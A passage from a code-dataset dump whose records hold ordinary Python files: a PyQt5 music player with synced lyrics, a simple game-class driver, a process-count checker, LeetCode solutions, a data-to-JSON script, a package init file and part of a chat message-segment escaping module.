MyNode(nextState, nextcost, nextpath, next_h)\n return NextNode","sub_path":"problem.py","file_name":"problem.py","file_ext":"py","file_size_in_byte":13541,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"33443108","text":"#! /usr/bin/env python3\n\nimport json\nimport pathlib\nimport random\nimport re\nimport sys\nimport taglib\nimport time\nfrom enum import Enum\nfrom typing import List, Dict, Tuple\n\nimport chardet\nfrom PyQt5 import QtGui\nfrom PyQt5.QtCore import *\nfrom PyQt5.QtGui import *\nfrom PyQt5.QtMultimedia import *\nfrom PyQt5.QtWidgets import *\n\n\nclass Config(object):\n config_path = pathlib.Path('~/.config/rawsteel-music-player').expanduser()\n config_path.parent.mkdir(parents=True) if not config_path.parent.exists() else None\n\n def __init__(self):\n super().__init__()\n self.playbackMode = MyPlaylist.PlaybackMode.LOOP\n self.playlist: List[MusicEntry] = list()\n self.volume = 50\n self.currentIndex = -1\n self.sortBy = 'ARTIST'\n self.sortOrder = 'ASCENDING'\n\n @staticmethod\n def load():\n print(\"Prepare to load config ...\")\n config = Config()\n if Config.config_path.exists():\n print(\"Loading config ...\")\n jd = json.loads(Config.config_path.read_text())\n config.playbackMode = MyPlaylist.PlaybackMode(jd['playbackMode'])\n for item in jd['playlist']:\n config.playlist.append(MusicEntry(\n pathlib.Path(item['path']),\n item['artist'],\n item['title'],\n item['duration']\n ))\n config.volume = jd['volume']\n config.currentIndex = jd['currentIndex']\n config.sortBy = jd['sortBy']\n config.sortOrder = jd['sortOrder']\n else:\n print(\"Config not exist\")\n return config\n\n def persist(self):\n print(\"Persisting config ...\")\n jd = dict(\n playbackMode=self.playbackMode.value,\n playlist=[dict(path=str(x.path), artist=x.artist, title=x.title, duration=x.duration)\n for x in self.playlist],\n volume=self.volume,\n currentIndex=self.currentIndex,\n sortBy=self.sortBy,\n sortOrder=self.sortOrder\n )\n jt = json.dumps(jd, indent=4, ensure_ascii=False)\n self.config_path.write_text(jt)\n\n\nclass MusicEntry(object):\n\n def __init__(self, path, artist, title, duration) -> None:\n super().__init__()\n self.path: pathlib.PosixPath = path\n self.artist: str = artist\n self.title: str = title\n self.duration: int = duration\n\n\ndef parse_lyric(text: str):\n regex = re.compile('((\\[\\d{2}:\\d{2}.\\d{2}\\])+)(.+)')\n lyric: Dict[int, str] = dict()\n for line in text.splitlines():\n line = line.strip()\n if not line:\n continue\n line = re.sub('(\\d{2})\\d\\]', '\\\\1]', line)\n match = regex.match(line)\n if not match: continue\n time_part = match.groups()[0]\n lyric_part = match.groups()[2].strip()\n for i in range(0, len(time_part), 10):\n this_time = time_part[i:i + 10]\n minutes, seconds = this_time[1:-1].split(':')\n milliseconds = int((int(minutes) * 60 + float(seconds)) * 1000)\n lyric[milliseconds] = lyric_part\n return lyric\n\n\nclass LoadPlaylistTask(QThread):\n music_found_signal = pyqtSignal(tuple)\n musics_found_signal = pyqtSignal(list)\n\n def __init__(self) -> None:\n super().__init__()\n self.music_files: List[pathlib.Path] = list()\n\n def run(self) -> None:\n print(\"Loading playlist...\")\n count = len(self.music_files)\n musics = list()\n for index, f in enumerate(self.music_files):\n # print(\"Scanning for {}\".format(f))\n artist, title = 'Unknown', 'Unknown'\n if '-' in f.stem: artist, title = f.stem.rsplit('-', maxsplit=1)\n file = taglib.File(str(f))\n artist = file.tags.get('ARTIST', [artist])[0]\n title = file.tags.get('TITLE', [title])[0]\n duration = file.length * 1000\n music_entry = MusicEntry(path=f, artist=artist, title=title, duration=duration)\n # self.music_found_signal.emit((music_entry, count, index + 1))\n time.sleep(0.0001)\n musics.append((music_entry, count, index + 1))\n if len(musics) == 10:\n self.musics_found_signal.emit(musics)\n musics = list()\n if len(musics) > 0:\n self.musics_found_signal.emit(musics)\n\n\nclass MyQSlider(QSlider):\n\n def mousePressEvent(self, ev: QtGui.QMouseEvent) -> None:\n if ev.button() == Qt.LeftButton:\n self.setValue(self.minimum() + (self.maximum() - self.minimum()) * ev.x() // self.width())\n ev.accept()\n super().mousePressEvent(ev)\n\n\nclass MyQLabel(QLabel):\n clicked = pyqtSignal(QMouseEvent)\n\n def mouseReleaseEvent(self, ev: QtGui.QMouseEvent) -> None:\n self.clicked.emit(ev)\n\n\nclass MyAboutDialog(QDialog):\n\n def __init__(self, parent):\n super().__init__(parent)\n self.resize(400, 300)\n self.setMaximumWidth(30)\n root = QVBoxLayout(self)\n github = 'https://github.com/baijifeilong/rawsteelp'\n pypi = 'https://pypi.org/project/rawsteel-music-player'\n aur = 'https://aur.archlinux.org/packages/rawsteel-music-player'\n label = QLabel('''\n Application: Rawsteel Music Player\n
\n Description: A minimal music player with lyric show\n
\n Author: BaiJiFeiLong@gmail.com \n
\n Github source: {0}\n
\n Python PyPI: {1}\n
\n ArchLinux AUR: {2}\n
\n License: GPL3\n
\n Powered by: Python and Qt\n '''.strip().format(github, pypi, aur), self)\n font = label.font()\n font.setPointSize(14)\n label.setFont(font)\n label.setOpenExternalLinks(True)\n button = QPushButton('OK', self)\n about_qt = QPushButton(\"About Qt\", self)\n button.clicked.connect(self.close)\n about_qt.clicked.connect(lambda: QMessageBox.aboutQt(self))\n bottom = QHBoxLayout(self)\n bottom.addStretch(1)\n bottom.addWidget(about_qt)\n bottom.addWidget(button)\n root.addWidget(label)\n root.addLayout(bottom)\n self.setWindowTitle(\"About\")\n self.setLayout(root)\n\n\nclass MyPlaylist(QObject):\n current_index_changed = pyqtSignal(int)\n volume_changed = pyqtSignal(int)\n playing_changed = pyqtSignal(bool)\n position_changed = pyqtSignal(int)\n duration_changed = pyqtSignal(int)\n\n class PlaybackMode(Enum):\n LOOP = 1\n RANDOM = 2\n\n def __init__(self) -> None:\n super().__init__()\n self._player = QMediaPlayer()\n self._playlist = QMediaPlaylist()\n self._musics: List[MusicEntry] = list()\n self._current_index = -1\n self._playback_mode = MyPlaylist.PlaybackMode.LOOP\n self._playing = False\n self._player.positionChanged.connect(self.position_changed.emit)\n self._player.durationChanged.connect(self.duration_changed.emit)\n self._player.stateChanged.connect(self._on_player_state_changed)\n self._history: Dict[int, int] = dict()\n self._history_index = -1\n\n def _on_player_state_changed(self, state):\n print(\"STATE CHANGED\")\n if state == QMediaPlayer.StoppedState:\n print(\"STOPPED\")\n self.next()\n self.play()\n\n def add_music(self, music: MusicEntry):\n self._musics.append(music)\n\n def remove_music(self, index):\n del self._musics[index]\n\n def clear(self):\n self._musics.clear()\n\n def music(self, index):\n return self._musics[index]\n\n def musics(self):\n return self._musics\n\n def play(self):\n if self.music_count() == 0:\n return\n if self._current_index == -1:\n self.set_current_index(0)\n self._player.play()\n self._playing = True\n self.playing_changed.emit(self._playing)\n\n def pause(self):\n self._player.pause()\n self._playing = False\n self.playing_changed.emit(self._playing)\n\n def previous(self):\n if self.music_count() == 0:\n self.set_current_index(-1)\n elif self._playback_mode == self.PlaybackMode.LOOP:\n self.set_current_index(self._current_index - 1 if self._current_index > 0 else self.music_count() - 1)\n else:\n self._history_index -= 1\n if (self._history_index not in self._history) or self._history[self._history_index] >= self.music_count():\n self._history[self._history_index] = self._next_random_index()\n self.set_current_index(self._history[self._history_index])\n\n def next(self):\n if self.music_count() == 0:\n self.set_current_index(-1)\n elif self._playback_mode == self.PlaybackMode.LOOP:\n self.set_current_index(self._current_index + 1 if self._current_index < self.music_count() - 1 else 0)\n else:\n self._history_index += 1\n if (self._history_index not in self._history) or self._history[self._history_index] >= self.music_count():\n self._history[self._history_index] = self._next_random_index()\n self.set_current_index(self._history[self._history_index])\n\n def _next_random_index(self):\n current_index = self._current_index\n next_index = random.randint(0, self.music_count() - 1)\n while self.music_count() > 1 and next_index == current_index:\n next_index = random.randint(0, self.music_count() - 1)\n return next_index\n\n def music_count(self):\n return len(self._musics)\n\n def set_current_index(self, index):\n self._current_index = index\n if index > -1:\n music = self._musics[index]\n self._player.blockSignals(True)\n self._player.setMedia(QMediaContent(QUrl.fromLocalFile(str(music.path))))\n self._player.blockSignals(False)\n if self._history_index == -1 and len(self._history) == 0:\n self._history[self._history_index] = index\n else:\n self._player.blockSignals(True)\n self._player.stop()\n self._player.blockSignals(False)\n self.current_index_changed.emit(index)\n\n def current_index(self):\n return self._current_index\n\n def get_playback_mode(self):\n return self._playback_mode\n\n def set_playback_mode(self, mode):\n self._playback_mode = mode\n\n def get_volume(self):\n return self._player.volume()\n\n def set_volume(self, volume):\n self._player.setVolume(volume)\n self.volume_changed.emit(volume)\n\n def get_position(self):\n return self._player.position()\n\n def set_position(self, position):\n self._player.setPosition(position)\n\n def get_duration(self):\n return self._player.duration()\n\n def is_playing(self):\n return self._playing\n\n def index_of(self, music: MusicEntry):\n return self._musics.index(music)\n\n\nclass PlayerWindow(QWidget):\n\n def __init__(self):\n super().__init__()\n self.play_button: QToolButton = None\n self.prev_button: QToolButton = None\n self.next_button: QToolButton = None\n self.playback_mode_button: QToolButton = None\n self.progress_slider: MyQSlider = None\n self.progress_label: QLabel = None\n self.volume_dial: QDial = None\n self.playlist_widget: QTableWidget = None\n self.lyric_wrapper: QScrollArea = None\n self.lyric_label: MyQLabel = None\n self.progress_dialog: QProgressDialog = None\n self.my_playlist: MyPlaylist = MyPlaylist()\n self.load_playlist_task = LoadPlaylistTask()\n self.musics: List[MusicEntry] = list()\n self.lyric: Dict[int, str] = None\n self.prev_lyric_index = -1\n self.config: Config = None\n self.real_row = -1\n self.mime_db = QMimeDatabase()\n self.setup_layout()\n self.setup_events()\n self.setup_player()\n\n def generate_tool_button(self, icon_name: str) -> QToolButton:\n button = QToolButton(parent=self)\n button.setIcon(QIcon.fromTheme(icon_name))\n button.setIconSize(QSize(50, 50))\n button.setAutoRaise(True)\n return button\n\n def setup_events(self):\n self.load_playlist_task.music_found_signal.connect(self.add_music)\n self.load_playlist_task.musics_found_signal.connect(self.add_musics)\n self.play_button.clicked.connect(self.toggle_play)\n self.prev_button.clicked.connect(self.on_play_previous)\n self.next_button.clicked.connect(self.on_play_next)\n self.playback_mode_button.clicked.connect(lambda: self.on_playback_mode_button_clicked())\n self.progress_slider.valueChanged.connect(self.on_progress_slider_value_changed)\n self.volume_dial.valueChanged.connect(self.on_volume_dial_value_changed)\n self.my_playlist.playing_changed.connect(self.on_playing_changed)\n self.my_playlist.position_changed.connect(self.on_player_position_changed)\n self.my_playlist.duration_changed.connect(self.on_player_duration_changed)\n self.my_playlist.current_index_changed.connect(self.on_playlist_current_index_changed)\n self.playlist_widget.doubleClicked.connect(self.dbl_clicked)\n self.lyric_label.clicked.connect(self.on_lyric_clicked)\n\n def on_lyric_clicked(self, event: QMouseEvent):\n if event.button() == Qt.LeftButton:\n if self.lyric is None:\n return\n loc = self.lyric_label.mapFromGlobal(self.lyric_label.cursor().pos())\n line = len(self.lyric) * loc.y() // self.lyric_label.height()\n print(\"clicked\", line)\n time = sorted(self.lyric.items())[line][0]\n self.my_playlist.set_position(time)\n elif event.button() == Qt.RightButton:\n menu = QMenu()\n menu.addAction(\"About\")\n menu.triggered.connect(lambda: MyAboutDialog(self).exec())\n menu.exec(QCursor.pos())\n menu.clear()\n\n def on_play_next(self):\n self.my_playlist.next()\n self.my_playlist.play()\n\n def on_play_previous(self):\n self.my_playlist.previous()\n self.my_playlist.play()\n\n def on_volume_dial_value_changed(self, value):\n self.set_volume(value)\n self.config.volume = value\n self.config.persist()\n\n def set_volume(self, volume):\n self.volume_dial.blockSignals(True)\n self.my_playlist.set_volume(volume)\n self.volume_dial.setValue(volume)\n self.volume_dial.blockSignals(False)\n\n def on_playback_mode_button_clicked(self):\n if self.my_playlist.get_playback_mode() == MyPlaylist.PlaybackMode.RANDOM:\n self.set_playback_mode(MyPlaylist.PlaybackMode.LOOP)\n else:\n self.set_playback_mode(MyPlaylist.PlaybackMode.RANDOM)\n self.config.persist()\n\n def set_playback_mode(self, playback_mode: MyPlaylist.PlaybackMode):\n self.config.playbackMode = playback_mode\n if playback_mode == MyPlaylist.PlaybackMode.LOOP:\n self.my_playlist.set_playback_mode(MyPlaylist.PlaybackMode.LOOP)\n self.playback_mode_button.setIcon(QIcon.fromTheme('media-playlist-repeat'))\n else:\n self.my_playlist.set_playback_mode(MyPlaylist.PlaybackMode.RANDOM)\n self.playback_mode_button.setIcon(QIcon.fromTheme('media-playlist-shuffle'))\n\n def on_progress_slider_value_changed(self, value):\n self.my_playlist.set_position(value * 1000)\n\n def on_playing_changed(self, playing: bool):\n if playing:\n self.play_button.setIcon(QIcon.fromTheme('media-playback-pause'))\n else:\n self.play_button.setIcon(QIcon.fromTheme('media-playback-start'))\n\n def on_player_position_changed(self, position: int):\n current = position // 1000\n total = self.my_playlist.get_duration() // 1000\n self.progress_label.setText(\n '{:02d}:{:02d}/{:02d}:{:02d}'.format(current // 60, current % 60, total // 60, total % 60))\n self.progress_slider.blockSignals(True)\n self.progress_slider.setValue(current)\n self.progress_slider.blockSignals(False)\n self.refresh_lyric()\n\n def on_player_duration_changed(self, duration: int):\n total = duration // 1000\n self.progress_slider.setMaximum(total)\n\n def on_playlist_current_index_changed(self, index):\n print(\"Playlist index changed: {}\".format(index))\n self.config.currentIndex = index\n self.config.persist()\n if index == -1:\n self.lyric = None\n self.lyric_label.setText(\"
No music
\")\n self.setWindowTitle('')\n return\n self.progress_slider.setValue(0)\n self.playlist_widget.selectRow(index)\n self.prev_lyric_index = -1\n music = self.my_playlist.music(index)\n self.setWindowTitle('{} - {}'.format(music.artist, music.title))\n music_file = music.path\n lyric_file: pathlib.PosixPath = music_file.parent / (music_file.stem + '.lrc')\n if lyric_file.exists():\n bys = lyric_file.read_bytes()\n encoding = chardet.detect(bys)['encoding']\n try:\n lyric_text = str(bys, encoding='GB18030')\n except UnicodeDecodeError:\n lyric_text = str(bys, encoding=encoding)\n self.lyric = parse_lyric(lyric_text)\n if len(self.lyric) > 0:\n self.refresh_lyric()\n else:\n self.lyric = None\n else:\n self.lyric = None\n print(\"Lyric file not found.\")\n\n def refresh_lyric(self):\n hbar = self.lyric_wrapper.horizontalScrollBar()\n hbar.hide()\n self.lyric_wrapper.horizontalScrollBar().setValue((hbar.maximum() + hbar.minimum()) // 2)\n if self.lyric is None:\n self.lyric_label.setText(\"
Lyric not found or not supported
\")\n return\n current_lyric_index = self.calc_current_lyric_index()\n if current_lyric_index == self.prev_lyric_index:\n return\n self.prev_lyric_index = current_lyric_index\n text = ''\n for i, (k, v) in enumerate(sorted(self.lyric.items())):\n if i == current_lyric_index:\n text += '
{}
'.format(v)\n else:\n text += '
{}
'.format(v)\n self.lyric_label.setText(text)\n self.lyric_wrapper.verticalScrollBar().setValue(\n self.lyric_label.height() * current_lyric_index // len(self.lyric)\n - self.lyric_wrapper.height() // 2\n )\n self.lyric_wrapper.horizontalScrollBar().setValue((hbar.maximum() + hbar.minimum()) // 2)\n\n def calc_current_lyric_index(self):\n entries: List[Tuple[int, str]] = sorted(self.lyric.items())\n current_position = self.my_playlist.get_position()\n if current_position < entries[0][0]:\n return 0\n for i in range(len(self.lyric) - 1):\n entry = entries[i]\n next_entry = entries[i + 1]\n if entry[0] <= current_position < next_entry[0]:\n return i\n return len(self.lyric) - 1\n\n def toggle_play(self):\n if self.my_playlist.is_playing():\n self.my_playlist.pause()\n else:\n self.my_playlist.play()\n\n def setup_player(self):\n self.config = Config.load()\n self.set_playback_mode(self.config.playbackMode)\n self.set_volume(self.config.volume)\n sort_by = dict(ARTIST=0, TITLE=1, DURATION=2)[self.config.sortBy]\n sort_order = Qt.AscendingOrder if self.config.sortOrder == 'ASCENDING' else Qt.DescendingOrder\n self.playlist_widget.horizontalHeader().setSortIndicator(sort_by, sort_order)\n for index, music in enumerate(self.config.playlist):\n self.add_music((music, len(self.config.playlist), index + 1), with_progress=False)\n if len(self.config.playlist) > 0 and self.config.currentIndex >= 0:\n self.my_playlist.set_current_index(self.config.currentIndex)\n\n def add_musics(self, musics):\n for music in musics:\n self.add_music(music)\n\n def add_music(self, entry, with_progress=True):\n music: MusicEntry = entry[0]\n total: int = entry[1]\n current: int = entry[2]\n # print(\"Add : {}\".format(music.path))\n self.progress_dialog.show()\n if total < 300 or current % 3 == 0:\n self.progress_dialog.setMaximum(total)\n self.progress_dialog.setValue(current)\n self.progress_dialog.setLabelText(music.path.stem + music.path.suffix)\n # if any([x.path == music.path for x in self.my_playlist.musics()]):\n # return\n row = self.playlist_widget.rowCount()\n self.playlist_widget.setSortingEnabled(False)\n self.playlist_widget.insertRow(row)\n self.playlist_widget.setItem(row, 0, QTableWidgetItem(music.artist))\n self.playlist_widget.setItem(row, 1, QTableWidgetItem(music.title))\n self.playlist_widget.setItem(row, 2, QTableWidgetItem(\n '{:02d}:{:02d}'.format(music.duration // 60000, music.duration // 1000 % 60)))\n self.playlist_widget.item(row, 0).setData(Qt.UserRole, music)\n # print(\"current: {}, last: {}\".format(music.title, last_music.title))\n self.my_playlist.add_music(music)\n if current == total:\n self.progress_dialog.setValue(total)\n self.playlist_widget.scrollToBottom()\n self.playlist_widget.setSortingEnabled(True)\n last_music: MusicEntry = self.playlist_widget.item(current - 1, 0).data(Qt.UserRole)\n print(\"current: {}, last: {}\".format(music.title, last_music.title))\n self.on_sort_ended()\n\n def dbl_clicked(self, item: QModelIndex):\n self.my_playlist.set_current_index(item.row())\n self.my_playlist.play()\n\n def setup_layout(self):\n self.play_button = self.generate_tool_button('media-playback-start')\n self.prev_button = self.generate_tool_button('media-skip-backward')\n self.next_button = self.generate_tool_button('media-skip-forward')\n self.playback_mode_button = self.generate_tool_button('media-playlist-shuffle')\n self.progress_slider = MyQSlider(Qt.Horizontal, self)\n self.progress_label = QLabel('00:00/00:00', self)\n self.volume_dial = QDial(self)\n self.volume_dial.setFixedSize(50, 50)\n self.playlist_widget = QTableWidget(0, 3, self)\n self.playlist_widget.setHorizontalHeaderLabels(('Artist', 'Title', 'Duration'))\n self.playlist_widget.setSelectionBehavior(QAbstractItemView.SelectRows)\n self.playlist_widget.setEditTriggers(QAbstractItemView.NoEditTriggers)\n self.playlist_widget.horizontalHeader().setSectionResizeMode(QHeaderView.Stretch)\n self.playlist_widget.horizontalHeader().setSortIndicator(0, Qt.AscendingOrder)\n self.playlist_widget.horizontalHeader().sectionClicked.connect(self.on_sort_ended)\n self.playlist_widget.setContextMenuPolicy(Qt.CustomContextMenu)\n self.playlist_widget.customContextMenuRequested.connect(self.on_request_context_menu)\n self.lyric_wrapper = QScrollArea(self)\n self.lyric_label = MyQLabel('
Hello, World!
')\n font = self.lyric_label.font()\n font.setPointSize(14)\n self.lyric_label.setFont(font)\n self.lyric_wrapper.setWidget(self.lyric_label)\n self.lyric_wrapper.setWidgetResizable(True)\n self.lyric_wrapper.verticalScrollBar().hide()\n self.init_progress_dialog()\n\n content_layout = QHBoxLayout()\n content_layout.addWidget(self.playlist_widget, 1)\n content_layout.addWidget(self.lyric_wrapper, 1)\n\n controller_layout = QHBoxLayout()\n controller_layout.addWidget(self.play_button)\n controller_layout.addWidget(self.prev_button)\n controller_layout.addWidget(self.next_button)\n controller_layout.addWidget(self.progress_slider)\n controller_layout.addWidget(self.progress_label)\n controller_layout.addWidget(self.playback_mode_button)\n controller_layout.addWidget(self.volume_dial)\n\n root_layout = QVBoxLayout(self)\n root_layout.addLayout(content_layout)\n root_layout.addLayout(controller_layout)\n self.setLayout(root_layout)\n self.resize(888, 666)\n self.setAcceptDrops(True)\n\n def on_request_context_menu(self):\n print(\"Requesting...\")\n menu = QMenu()\n menu.addAction(\"Delete\")\n menu.triggered.connect(self.remove_music)\n menu.exec(QCursor.pos())\n menu.clear()\n\n def remove_music(self):\n current_index = self.my_playlist.current_index()\n playing = self.my_playlist.is_playing()\n indices = sorted(list(set([x.row() for x in self.playlist_widget.selectedIndexes()])), reverse=True)\n for index in indices:\n self.my_playlist.remove_music(index)\n self.playlist_widget.removeRow(index)\n print(\"Removing index={}, currentIndex={}\".format(index, current_index))\n self.config.persist()\n if current_index in indices:\n if self.my_playlist.music_count() > 0:\n self.my_playlist.next()\n else:\n self.my_playlist.set_current_index(-1)\n if playing:\n self.my_playlist.play()\n\n def init_progress_dialog(self):\n self.progress_dialog = QProgressDialog(self)\n # noinspection PyTypeChecker\n self.progress_dialog.setCancelButton(None)\n self.progress_dialog.setWindowTitle(\"Loading music\")\n self.progress_dialog.setFixedSize(444, 150)\n self.progress_dialog.setModal(True)\n self.progress_dialog.setValue(100)\n\n def on_sort_ended(self):\n self.my_playlist.clear()\n for row in range(self.playlist_widget.rowCount()):\n music: MusicEntry = self.playlist_widget.item(row, 0).data(Qt.UserRole)\n self.my_playlist.add_music(music)\n self.config.playlist = self.my_playlist.musics()\n self.config.sortBy = {0: 'ARTIST', 1: 'TITLE', 2: 'DURATION'}[\n self.playlist_widget.horizontalHeader().sortIndicatorSection()]\n self.config.sortOrder = 'ASCENDING' if \\\n self.playlist_widget.horizontalHeader().sortIndicatorOrder() == Qt.AscendingOrder else 'DESCENDING'\n self.config.persist()\n\n def resizeEvent(self, a0: QtGui.QResizeEvent) -> None:\n super().resizeEvent(a0)\n if self.lyric:\n self.prev_lyric_index = -1\n self.refresh_lyric()\n\n def dragEnterEvent(self, event: QtGui.QDragEnterEvent) -> None:\n if event.mimeData().hasUrls():\n event.accept()\n\n def dropEvent(self, event: QtGui.QDropEvent) -> None:\n urls: List[QUrl] = event.mimeData().urls()\n paths = [pathlib.Path(x.path()) for x in urls if self.mime_db.mimeTypeForUrl(x).name().startswith('audio/')]\n self.load_playlist_task.music_files = paths\n self.load_playlist_task.start()\n self.init_progress_dialog()\n\n\ndef main():\n app = QApplication(sys.argv)\n app.setApplicationName('Rawsteel Music Player')\n app.setApplicationDisplayName('Rawsteel Music Player')\n app.setWindowIcon(QIcon.fromTheme('audio-headphones'))\n window = PlayerWindow()\n window.show()\n try:\n app.exec()\n except Exception as e:\n print(\"Exception\", e)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"rawsteelp/rawsteelp.py","file_name":"rawsteelp.py","file_ext":"py","file_size_in_byte":27762,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"610492349","text":"from player import Player\nfrom enemy import Enemy, Troll, Vampyre, VampyreKing\n\n\nplayer_1 = Player(\"Tadhg\")\n\nzombie = Enemy(\"Zombie\", 5, 1)\nprint(zombie)\n\n# zombie.take_damage(4)\n# print(zombie)\n#\n# zombie.take_damage(1)\n# print(zombie)\n#\n# zombie.take_damage(6)\n# print(zombie)\n\n# instantiating a subclass method\n# troll_1 = Troll(\"Og\")\n# print(troll_1)\n#\n# troll_2 = Enemy(\"Bog\", 10, 1)\n# print(troll_2)\n#\n# # using a subclasses methods\n# troll_1.grunt()\n#\n# # as troll 2 is not a Troll object it cannot use the sub classes methods\n# # troll_2.grunts()\n#\n# Dr_Acula = Vampyre(\"Dr. Acula\")\n# print(Dr_Acula)\n#\n# # subclass using superclasses methods\n# troll_1.take_damage(10)\n# print(troll_1)\n\n# Dr_Acula.take_damage(13)\n# print(Dr_Acula)\n\nprint(\"=\" * 40)\n\n# while Dr_Acula.alive:\n# Dr_Acula.take_damage(1)\n# print(Dr_Acula)\n\nVampKing = VampyreKing(\"Vampyre King\")\nprint(VampKing)\n\nVampKing.take_damage(17)\nprint(VampKing)\n","sub_path":"ObjectOrientedPorgramming/Game/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":932,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"104013954","text":"#!/usr/bin/env python3\n# Author: Robert Freiberger\n# Title: process_check.py\n# Notes: A simple test of subprocess and testing\n# Date: 1/20/2017\n# Repo:\n# License: BSD\n\nimport subprocess\n\n\ndef decoder(coded_string):\n return coded_string.decode('UTF-8')\n\n\ndef command_run(command):\n results = subprocess.Popen(\n command,\n shell=True,\n stdin=subprocess.PIPE,\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE,\n )\n stdout_value, stderr_value = results.communicate()\n if stderr_value:\n print(\"### Error Output ###\")\n print(decoder(stderr_value))\n print(\"### Error Output ###\")\n else:\n return decoder(stdout_value)\n\n\ndef level_range(current_value, max_value):\n percent_value = int(100 * (current_value / max_value))\n if percent_value >= 0 and percent_value <= 25:\n return_message = \"Value is near zero\"\n elif percent_value >= 26 and percent_value <= 50:\n return_message = \"Value is low\"\n elif percent_value >= 51 and percent_value <= 75:\n return_message = \"Value is medium\"\n elif percent_value >= 76 and percent_value <= 100:\n return_message = \"Value is high\"\n return return_message\n\n\ndef level_alert(current_value, max_value):\n ## Alerts when current value is above max value\n if current_value >= max_value:\n return \"Alert!!! - threshold passed!!!\"\n else:\n return \"Value below alerting threhold.\"\n\n# Define the commands and alerts\ncmd_results = int((command_run('ps aux | grep root | wc -l')))\nprint(level_range(cmd_results, 200))\nprint(level_alert(cmd_results, 200))\n","sub_path":"SimpleTest2/process_check.py","file_name":"process_check.py","file_ext":"py","file_size_in_byte":1640,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"499697239","text":"# Definition for a binary tree node\r\n# class TreeNode:\r\n# def __init__(self, x):\r\n# self.val = x\r\n# self.left = None\r\n# self.right = None\r\n\r\nclass Solution:\r\n # @param root, a tree node\r\n # @return an integer\r\n def minDepth(self, root, dist=1):\r\n if not root: return 0\r\n if not root.left and not root.right: return dist\r\n if not root.left: return self.minDepth(root.right, dist+1)\r\n if not root.right: return self.minDepth(root.left, dist+1)\r\n return min(self.minDepth(root.left, dist+1), self.minDepth(root.right, dist+1))","sub_path":"leetcode_111.py","file_name":"leetcode_111.py","file_ext":"py","file_size_in_byte":596,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"486410435","text":"# brilliant!!!\n\nclass Solution:\n def moveZeroes(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: void Do not return anything, modify nums in-place instead.\n \"\"\"\n\n if not nums:\n return\n\n zero = 0\n for i in range(len(nums)):\n # print(zero, i, nums)\n if nums[i] != 0:\n nums[i], nums[zero] = nums[zero], nums[i]\n zero += 1\n\n\nn = [1, 0, 1, 0, 3, 12]\ns = Solution()\ns.moveZeroes(n)\nprint(n)\n","sub_path":"python/283. Move Zeroes-concise.py","file_name":"283. Move Zeroes-concise.py","file_ext":"py","file_size_in_byte":501,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"409608666","text":"import json\njfin = []\ndata = open('mepointize.data','r')\nx = []\ny = []\nunparseddata = data.readlines()\n\nfor datalet in unparseddata:\n try:\n i,j = datalet.split(',')\n x.append(float(i))\n y.append(float(j))\n except:\n print(\"MESSED\" , datalet)\nprint(type(i))\n\nfor _ in range(len(x)):\n a,b = x[_],y[_]\n jdat = json.dumps({\n 'x':a ,\n 'y':b\n })\n jfin.append(jdat)\n\nprint(jfin[0])\njfile = open(\"jsondata.json\",'w')\n\njfile.write('{')\nc = 0;\nfor jl in jfin:\n jfile.write(f'\"{c}\":')\n jfile.write(jl)\n jfile.write(',')\n c+=1\njfile.write('}')","sub_path":"fourierCirclesRE/parsedata.py","file_name":"parsedata.py","file_ext":"py","file_size_in_byte":600,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"471562916","text":"\"\"\"\nThe omc3 library\n~~~~~~~~~~~~~~~~\n\nomc3 is a tool package for the optics measurements and corrections group (OMC) at CERN.\n\n:copyright: pyLHC/OMC-Team working group.\n:license: MIT, see the LICENSE file for details.\n\"\"\"\n\n__title__ = \"omc3\"\n__description__ = \"An accelerator physics tools package for the OMC team at CERN.\"\n__url__ = \"https://github.com/pylhc/omc3\"\n__version__ = \"0.11.1\"\n__author__ = \"pylhc\"\n__author_email__ = \"pylhc@github.com\"\n__license__ = \"MIT\"\n\n__all__ = [__version__]\n","sub_path":"omc3/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":495,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"213025764","text":"import re\nfrom typing import Iterable, Dict, Tuple, Any\n\n\ndef escape(s: str, *, escape_comma: bool = True) -> str:\n s = s.replace('&', '&') \\\n .replace('[', '[') \\\n .replace(']', ']')\n if escape_comma:\n s = s.replace(',', ',')\n return s\n\n\ndef unescape(s: str) -> str:\n return s.replace(',', ',') \\\n .replace('[', '[') \\\n .replace(']', ']') \\\n .replace('&', '&')\n\n\ndef _b2s(b: bool):\n if b:\n return '1'\n else:\n return '0'\n\n\nclass MessageSegment(dict):\n def __init__(self, d: Dict[str, Any] = None, *,\n type: str = None, data: Dict[str, str] = None):\n super().__init__()\n if isinstance(d, dict) and d.get('type'):\n self.update(d)\n elif type:\n self['type'] = type\n self['data'] = data or {}\n else:\n raise ValueError('the \"type\" field cannot be None or empty')\n\n def __getitem__(self, item):\n if item not in ('type', 'data'):\n raise KeyError(f'the key \"{item}\" is not allowed')\n return super().__getitem__(item)\n\n def __setitem__(self, key, value):\n if key not in ('type', 'data'):\n raise KeyError(f'the key \"{key}\" is not allowed')\n return super().__setitem__(key, value)\n\n def __delitem__(self, key):\n raise NotImplementedError\n\n def __getattr__(self, item):\n try:\n return self.__getitem__(item)\n except KeyError:\n raise AttributeError(f'the attribute \"{item}\" is not allowed')\n\n def __setattr__(self, key, value):\n try:\n return self.__setitem__(key, value)\n except KeyError:\n raise AttributeError(f'the attribute \"{key}\" is not allowed')\n\n def __str__(self):\n if self.type == 'text':\n return escape(self.data.get('text', ''), escape_comma=False)\n\n params = ','.join(('{}={}'.format(k, escape(str(v)))\n for k, v in self.data.items()))\n if params:\n params = ',' + params\n return '[CQ:{type}{params}]'.format(type=self.type, params=params)\n\n def __eq__(self, other):\n if not 